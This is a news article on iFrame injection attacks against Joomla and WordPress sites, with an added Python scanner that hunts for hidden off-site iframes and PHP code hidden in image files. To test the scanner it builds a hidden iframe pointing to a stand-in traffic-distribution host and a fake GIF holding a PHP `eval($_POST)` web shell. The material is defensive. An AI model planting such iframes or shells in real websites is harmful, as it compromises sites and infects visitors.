Joomla, WordPress Sites Hit by IFrame Injection Attacks

Users of the popular Joomla content management system are being urged by security experts to upgrade to the latest version after reports of exploits being used to compromise websites built on the platform.

The SANS Internet Storm Center received numerous reports that Joomla sites, as well as WordPress sites, had been compromised and iFrames had been injected that were pointing visitors to malicious sites.

“The interesting thing to note is that it doesn’t seem to be a scanner exploiting one vulnerability, but some tool that’s basically firing a bunch of Joomla and WordPress exploits at a given server and hoping something hits,” said ISC handler John Bambenek.

Joomla sites built with extensions were, in particular, being exploited, Bambenek said.

The ISC report identified a pair of IP addresses, 78.157.192.72 and 108.174.52.38, as the biggest offenders. The exploits, Bambenek said, were loading scareware on victims’ computers.

German security and tech site The H reports that the German Computer Emergency Response Team (CERT-Bund) also confirmed attacks emanating from Joomla sites. CERT-Bund said the iFrame points visitors to a Sutra Traffic Distribution System that eventually lands them on a site hosting an exploit kit.  

In September, Joomla warned of a series of automated attacks against the Joomla Content Editor versions 2.0.11 and earlier that were infecting websites with malicious content. The attacks were dropping malicious GIF images; attackers were able to attack the front end without authentication, Joomla said at the time in an advisory.

The GIF is in fact a PHP shell, which gives the attacker a launchpad for further attacks such as redirecting visitors to a malicious site, spam or phishing campaigns, or unauthorized database access.
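Two of the artifacts described above, an injected hidden iframe pointing off-site and an "image" whose body is really a PHP shell, are both cheap to hunt for in a web root. The following scanner is an added example written for this page; it is not code from the article, SANS ISC, CERT-Bund or the Joomla project. The sample template, the `example-tds.invalid` hostname, the fake GIF payload and the "hidden or tiny, and off-site" heuristic are all constructed for the demonstration, and the paths mimic a Joomla layout only as an assumption.

```python
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample content (not taken from any real compromise): a page
# template with one injected 1x1 hidden iframe next to a legitimate same-site
# embed, a "GIF" whose body is a PHP one-liner, and a genuine 1x1 GIF.
INJECTED_TEMPLATE = (
    '<html><body><h1>Welcome</h1>\n'
    '<iframe src="http://example-tds.invalid/in.cgi?3" width="1" height="1" '
    'style="visibility:hidden"></iframe>\n'
    '<iframe src="https://www.example.com/embed" width="640" height="360">'
    '</iframe>\n</body></html>'
)
FAKE_GIF_SHELL = b'GIF89a\x01\x00\x01\x00\x00<?php eval($_POST["c"]); ?>'
REAL_GIF = (b'GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00,'
            b'\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;')

IMAGE_EXT = {'.gif', '.jpg', '.jpeg', '.png', '.ico', '.bmp'}
TEXT_EXT = {'.html', '.htm', '.php', '.js', '.tpl'}
PHP_TAG = re.compile(rb'<\?(php\b|=)', re.IGNORECASE)
HIDDEN_STYLE = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden', re.I)


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes (lower-cased keys)."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == 'iframe':
            self.iframes.append({k.lower(): (v or '') for k, v in attrs})


def _tiny(value):
    """True for width/height attributes of 0 or 1 (with or without 'px')."""
    try:
        return int(value.strip().rstrip('px')) <= 1
    except ValueError:
        return False


def suspicious_iframes(html, site_host):
    """Return src values of iframes that are both off-site and hidden/tiny.

    Requiring both conditions keeps legitimate same-site embeds and visible
    third-party players out of the results (heuristic; an assumption here).
    """
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for frame in parser.iframes:
        src = frame.get('src', '')
        host = urlparse(src).hostname or site_host   # relative src = same site
        offsite = host.lower() != site_host.lower()
        hidden = (HIDDEN_STYLE.search(frame.get('style', '')) is not None
                  or _tiny(frame.get('width', '')) or _tiny(frame.get('height', '')))
        if offsite and hidden:
            hits.append(src)
    return hits


def php_in_image(data):
    """True if a file that should be an image contains a PHP open tag."""
    return PHP_TAG.search(data) is not None


def scan_webroot(root, site_host):
    """Walk root and return (path, kind, detail) for every finding."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            with open(path, 'rb') as fh:
                data = fh.read()
            if ext in IMAGE_EXT and php_in_image(data):
                findings.append((path, 'php_in_image', ext))
            elif ext in TEXT_EXT:
                for src in suspicious_iframes(data.decode('utf-8', 'replace'), site_host):
                    findings.append((path, 'hidden_offsite_iframe', src))
    return findings


def make_sample_webroot():
    """Write the constructed samples into a Joomla-like temp tree (assumed layout)."""
    root = tempfile.mkdtemp(prefix='webroot_')
    samples = {
        'templates/index.php': INJECTED_TEMPLATE.encode(),
        'images/stories/logo.gif': FAKE_GIF_SHELL,
        'images/pixel.gif': REAL_GIF,
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'wb') as fh:
            fh.write(body)
    return root


if __name__ == '__main__':
    for path, kind, detail in scan_webroot(make_sample_webroot(), 'www.example.com'):
        print(f'{kind:22} {path}  ->  {detail}')
```

Run against a real document root, pass the site's own hostname so same-site embeds are not flagged, and treat every `php_in_image` hit as a shell until proven otherwise: a legitimate image never needs a `<?php` tag.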

The H added that traffic distribution systems are channels through which attackers buy and sell Web traffic: a visitor who clicks a particular link is routed by the TDS to the vendor, which in this case sells that traffic on to the attacker.
